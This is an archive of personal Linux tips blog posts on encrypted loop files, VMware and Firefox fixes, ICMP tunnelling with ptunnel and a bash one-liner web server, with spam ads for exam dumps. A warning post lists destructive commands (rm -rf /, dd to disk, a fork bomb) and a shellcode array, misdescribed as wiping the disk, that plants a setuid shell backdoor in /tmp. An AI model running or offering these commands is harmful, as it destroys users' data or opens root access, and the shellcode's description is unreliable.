Linux * Screw » hacks

16 GB encrypted candy file

artiomix — Wed, 05 May 2010 15:01:50 +0000

Update: as far as cryptoloop is vulnerable and is not maintained I don’t recommend using below approach for creating encrypted for for those of you who require strong security. Use truecrypt to create encrypted filesystem within a file instead.

Today it came to my mind that it is time to make sensitive information stored on my usb flash drive encrypted but still transportable and easy to use. But I don’t want to have whole my 32 GB usb drive fully encrypted using truecrypt or something similar. It is just toooo slow. I also don’t want to use GPG for uncompressing files and directories every time I would like to read them and then create new GPG compressed file every time I save changes. This eats too much of my time and system resources. At the same time it is necessary to be able to use that usb drive under windows, mac, linux whatever (read/write files) but still have my directory structure with sensitive files encrypted. Here is the solution: create encrypted filesystem within a file named, say, 16GB.candy.bin that could be stored on regular windows formatted usb flash drive and then mounted under Linux using the password.

When it becomes necessary I can mount that 16GB.candy.bin as the regular ext3 filesystem with all those stuff like permissions, ownership etc. that is available on ext3 but not in FAT or NTFS. On my windows formatted flash drive candy takes only 16 GB so I can use the rest of space to store not so sensitive information like mp3, movies or photos. Moreover I on windows or linux to read it.

Let’s create that 16GB.candy.bin file with encrypted ext3 filesystem (read below explanations below carefully before just to copy/paste commands into CLI):

[root@artemn root]# cd /path/to/candy/


[root@artemn root]# modprobe cryptoloop
[root@artemn root]# modprobe aes
[root@artemn root]# dd if=/dev/urandom of=16GB.candy.bin bs=1048576 count=16000
[root@artemn root]# losetup -e aes /dev/loop0 16GB.candy.bin
[root@artemn root]# mkfs.ext3 /dev/loop0

[root@artemn root]# tune2fs -i 0 -c 0 /dev/loop0

Here are some points: using above commands we create encrypted file of 16 GB so if you need to have more or less just change “count=16000″ in dd line. “count=16000″ means 16GB so “count=20″ means 20MB. Path ‘/path/to/candy/’ is for example only so you should change it to real directory that is able to host encrypted file (16 GB in above example). Command losetup is present in most Linux distributions (btw I recommend Ubuntu especially newly released Lucid Lynx) but if it is not use your disro’s packet manager to install it or compile from sources (for super geeks only, Mr. Stallman if you read this article — Hello). Reader, you can replace “/dev/urandom” in dd line with “/dev/zero” that will make that command to finish faster but will lower security level of resulting file (read about AES for better understanding). You will need to enter the password when running losetup command so make sure it safe and long enough like ‘6U2sAsR37Hn8122dGsaPrew1twt’ but not ‘abc123′ or ‘iloveyou’.

Once commands are done you will get 16GB.candy.bin containing encrypted ext3 filesystem. You can store this file where ever you want, say, on a flash drive. If you loose it nobody won’t be able to open it until he (or she!) cracked AES encryption (use long passwords to prevent this). As the next step it is required to mount filesystem and store some files/directories in it:

[root@artemn root]# mkdir -p /mnt/candy


[root@artemn root]# cd /path/to/candy/
[root@artemn root]# mount -t ext3 -o loop,encryption=aes 16GB.candy.bin /mnt/candy
[root@artemn root]# cd /mnt/candy
[root@artemn root]# #save files, edit them, view or anything you want
[root@artemn root]# cd /

[root@artemn root]# umount /mnt/candy

When you unmount 16GB.candy.bin the changes are already saved there so it’s not required to compress and encrypt anything unlike with GPG.

P.S. This post is inspired by Loopback tricks article. Thanks to the author. Good luck!

13 Linux lethal commands

artiomix — Thu, 03 Dec 2009 08:02:52 +0000

In this post I will collect all commands which SHOULD NEVER be executed in Linux. Any of them will cause data loss or corruption, can freeze or hang up running system.

NEVER RUN THESE COMMANDS IN LINUX BOX CLI!

Even if somebody advises you in forum/im to do it.

1. Any of these commands will erase everything from your home directory, root or just will clear up whole disk:

sudo rm -rf /
rm -rf .*
dd if=/dev/zero of=/dev/sda
mkfs.ext3 /dev/hda
whatever > /dev/hda
cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
find -type f -mtime +30 -exec mv {} /dev/null \;
mv ~ /dev/null
mv / /dev/null

2. Causes kernel panic or freezes Linux box:

dd if=/dev/random of=/dev/port
){:|:&};: #also known as fork bomb


3. This one does the same as "rm -rf /":
char esp[] __attribute__ ((section(".text"))) /* e.s.p

release */

= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"

"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"

"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"

"\x6e\x2f\x73\x68\x00\x2d\x63\x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";
4. This one will prevent you from executing commands with root rights:
rm -f /usr/bin/sudo;rm -f /bin/su
If you know any other commands that can damage running Linux system or pose fatal problem to system administrators -- just comment it here so I could update this post. Thanks.
Update: See what happens if execute rm -rf / in Ubuntu: http://www.youtube.com/watch?v=wWOjmvWPRvQ

Information improvisation: Subscribe for 650-575 dumps training sessions to guarantee pass 642-611 exam. Also get free download link for the next 1z0-533 exam, after getting success in 70-433 & 642-661, you can find a wonderful job.



VMware server console keyboard problem in Ubuntu Intrepid Ibex
artiomix — Fri, 19 Dec 2008 12:13:23 +0000
Few days ago I have upgraded my Ubuntu to latest 8.10 (Intrepid Ibex) and found that keyboard just doesn’t work in VMware Server Console. The problem was that I couldn’t use keyboard under guest operating system including Windows, Linux etc. After few hours of research I found simple solution which works for me:
$ setxkbmap

$ echo "xkeymap.nokeycodeMap = true" >> ~/.vmware/config
After this restart vmware-server-console and see if it helps. If not you can see other solutions of the same problem at this site:

 http://nthrbldyblg.blogspot.com/2008/06/vmware-and-fubar-keyboard-effect.html
I hope it helps!



P.S. Here are vmware-server-console’s libs I use:
artemn@artemn-laptop:~$ ls -la /usr/lib/vmware-server-console/lib
total 172
drwxr-xr-x 40 root root  4096 2008-12-24 12:56 .
drwxr-xr-x 11 root root  4096 2008-12-24 12:56 ..
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libart_lgpl_2.so.2
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libatk-1.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libatkmm-1.6.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libcrypto.so.0.9.7
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libexpat.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libfontconfig.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libfreetype.so.6
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgcc_s.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgdkmm-2.4.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgdk_pixbuf-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgdk-x11-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libglade-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libglib-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libglibmm-2.4.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libglibmm_generate_extra_defs-2.4.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgmodule-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgnomecanvas-2.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgnomecanvasmm-2.6.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgobject-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgthread-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgtkmm-2.4.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libgtk-x11-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libpango-1.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libpangoft2-1.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libpangomm-1.4.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libpangox-1.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libpangoxft-1.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libpng12.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 librsvg-2.so.2
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libsexymm.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libsexy.so.1
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libsigc-2.0.so.0
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libssl.so.0.9.7
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libstdc++.so.5
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libview.so.2
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libXft.so.2
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libxml2.so.2
drwxr-xr-x  2 root root  4096 2008-12-24 12:56 libXrender.so.1
-r-xr-xr-x  1 root root 10173 2008-12-24 12:56 wrapper-gtk24.sh

Information improvisation: We are the world leaders in providing best 000-104 & 117-102 exams prep solutions. Our incredible offers for 70-663 and 156-215.70 exams are accessible at reasonable prices; 650-195 is very rare in IT world sense.





WPA Wi-Fi encryption is now cracked
artiomix — Fri, 07 Nov 2008 10:26:07 +0000
Network security researcher Erik Tews found a way to brake TKIP (Temporal Key Integrity Protocol) used by WPA in order to read the data being sent from router to Wi-Fi laptop or PC. It takes from 12 to 15 minutes to crack WPA encryption according to statements made by PacSec conference organizers where Erik will demonstrate the procedure.
PacSec 2008 Conference will be held on November 12/13, 2008, at Aoyama Diamond Hall in Tokyo, Japan. The presentation is planned as “Gone in 900 Seconds, Some Crypto Issues with WPA – Erik Tews”.
WPA (Wi-Fi Protected Area) is widely used to protect many corporate and personal wireless networks. This  protocol implements IEEE 802.11i standard and is a successor of WEP algorithm which was cracked in 2001.
Read more here: Once thought safe, WPA Wi-Fi encryption is cracked.



FAQ: How to order pizza from Linux CLI?
artiomix — Fri, 08 Aug 2008 13:34:25 +0000
Q: How can I order my favourite pizza by using Linux command line interface?
A: Well… You can use Pizza Party application written by Cory Arcangel and Michael Frumin! Here are some features this outstanding application provides:



Can order pizza with only a few keystrokes.
Can save pizza preferences.
Can use batch files for ordering many pizzas.
Has easy to use flags for ordering different toppings.
Runs on most UNIX-like operating systems.
Supports most currently popular topings like “mushrooms”, and      “pepperoni”!
Unattended / background operation.
Pizza Party is distributed under the GNU General Public License.

Download Pizza Party’s initial source code here and python ported version from this link.

P.S. This portion of Friday humour is provided by Royal HeHe2-ness!  

Information improvisation: You can sign up for 70-576 training program to guarantee passes your HP0-J43 exam. We also offer best quality self study resources for 70-536 & OG0-093, have you ever heard about 000-152, they are stunning in IT world.





Install Firefox 3 in Debian Etch
artiomix — Sat, 21 Jun 2008 13:49:45 +0000
If you downloaded fresh Firefox 3 installation e.g. from here and tried to install it in Debian Etch, you might notice that latest version of the popular browser requires GTK+ 2.10 while Etch contains only 2.8:
We're sorry, this application requires a version of the GTK+
library that is not installed on your computer.
You have GTK+ 2.8.This application requires GTK+ 2.10 or newer.Please upgrade your GTK+ library if you wish to use this application
Thankfully there is no need to upgrade GTK+, the tips given here (and here) will keep you from headache. The only thing that is necessary to do to get Firefox 3 working at Debian Etch, is to get GTK+ from backports by the following commands:
wget http://apt.linex.org/linex/gtk-2.10/libgtk2.0-0_2.10.13-2%7Ebpo.1_i386.deb

dpkg-deb -x libgtk2.0-0_2.10.13-2~bpo.1_i386.deb gtk2-10
Then copy contents of newly created directory gtk2-10 to /opt/firefox3 and add the following line into /opt/firefox3/firefox:
#!/bin/sh

#

export LD_LIBRARY_PATH="/opt/firefox3/gtk2-10/usr/lib"
It is necessary to inform Firefox where is new GTK+ is located   Now it’s time to start Firefox…
P.S. In other distributions you can try to compile/install GTK+2.10 manually:



cd /usr/local/src

wget http://ftp.gnome.org/pub/GNOME/sources/gtk+/2.10/gtk+-2.10.14.tar.bz2

tar xjf gtk+-2.10.14.tar.bz2

mkdir gtk210

cd gtk+-2.10.14

./configure --prefix=/opt/firefox3/gtk2-10

make install





Mount your Flickr account as regular Linux drive
artiomix — Wed, 30 Apr 2008 14:34:14 +0000
Flickr is an extremely popular image/video hosting website, web services suite and an online community platform. It was one of the earliest Web 2.0 applications. In addition to being a popular Web site for users to share personal photographs, the service is widely used by bloggers as a photo repository. It hosts more than two billion images.
Now it is possible to mount your Flickr account on Linux PC as a virtual filesystem, allowing you to browse through your photos as if they were on a locally connected drive.  It can be now easily done with Flickrfs:
Once mounted, it retrieves information about your photos hosted on your flickr account, and shows them as files. You can now easily copy photos from your local machine to this mount, and it will automatically upload them to your flickr account. Similary, you can copy the files from your mount to your local machine, and it will download your images from flickr.
All the files in the mount have a meta file attached to them, which provides access to title, description, tags, and license information. Modifying any of these fields and saving the meta file, will update them on the server as well.
You are lucky if you chose Ubuntu as detailed step-by-step installation guide is available at author’s site for Ubuntu users. Of course you are welcome to use it under other Linux distributions e.g. Slackware  



ptunnel: send/receive TCP traffic via ICMP reliably
artiomix — Thu, 10 Apr 2008 20:36:47 +0000
Yes, it can be useful sometimes. For example, you have access to Wi-Fi network but you’re not allowed to access Internet via TCP/UDP as these protocols are blocked. At the same time ICMP is opened and you can ping everything alive in Internet. So, to check your email just have ptunnel installed and work around the restrictions set by the Wi-Fi network sysadmin easily.
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. It is not a feature-rich tool by any means, but it does what it advertises. So here is what it can do:

Tunnel TCP using ICMP echo request and reply packets
Connections are reliable (lost packets are resent as necessary)
Handles multiple connections
Acceptable bandwidth (150 kb/s downstream and about 50 kb/s upstream are the currently measured maximas for one tunnel)
Authentication, to prevent just anyone from using your proxy


1. Install ptunnel in Ubuntu or Debian

apt-get install ptunnel
2. Start ptunnel proxy:
ptunnel -p proxy_address -lp listen_port  -da  destination_address  -dp dest_port  [-c  network_device]  [-v  verbosity] [-u] [-x password] [-f file]
The following example assumes that ptunnel is run as root, both  on  the  proxy  and  client.  To  tunnel  ssh connections from the client machine via a  proxy running on proxy.pingtunnel.com to the computer login.domain.com, the following command line would be used:
ptunnel -p proxy.pingtunnel.com -lp 8000 -da login.domain.com -dp 22
An  ssh  connection  to login.domain.com can now be established as follows:
ssh -p 8000 localhost
P.S. A brief manual on how to use ptunnel can be got here.

P.P.S. If you are sysadmin and have to forbid Internet access to some user in LAN, don’t forget to block ICMP!  



KDE on Nokia Internet Tablet n800 and n770
artiomix — Wed, 12 Sep 2007 08:19:50 +0000
The Nokia N800 Internet Tablet is a wireless Internet appliance from Nokia. The N800 was developed as the successor to the Nokia 770. It is designed for wireless Internet browsing and e-mail functions and includes software such as FM and Internet radio, an RSS news reader, image viewer and media players for selected types of media.
TY:
KDE and all it’s supporting programs have been compiled for the Internet Tablet, and it works b-e-a-utifully. I’ve installed this sucker on my N770 and it purrs like a kitten, believe it or not  

Read more…



Web server oneliner with bash
artiomix — Thu, 06 Sep 2007 20:46:53 +0000
It’s amazing but it’s possible to write little web server on bash shell script. Here is it’s source code:
:;while [ $? -eq 0 ];do nc -vlp 8080 -c'(r=read;e=echo;$r a b c;z=$r;while [ ${#z} -gt 2 ];do $r z;done;f=`$e $b|sed 's/[^a-z0-9_.-]//gi'`;h="HTTP/1.0";o="$h 200 OK\r\n";c="Content";if [ -z $f ];then($e $o;ls|(while $r n;do if [ -f "$n" ]; then $e "`ls -gh $n`";fi;done););elif [ -f $f ];then $e "$o$c-Type: `file -ib $f`\n$c-Length: `stat -c%s $f`";$e;cat $f;else $e -e "$h 404 Not Found\n\n404\n";fi)';done

You can download it here.
Just run it and then load web page http://192.168.0.7:8080, where 192.168.0.7 is IP address of the Linux machine you’ve started above mentioned bash script. You’ll see links to files located in directory the script was started at.  My respect to Alexey Sveshnikov.
P.S. Script was tested at Ubuntu and Debian Linux.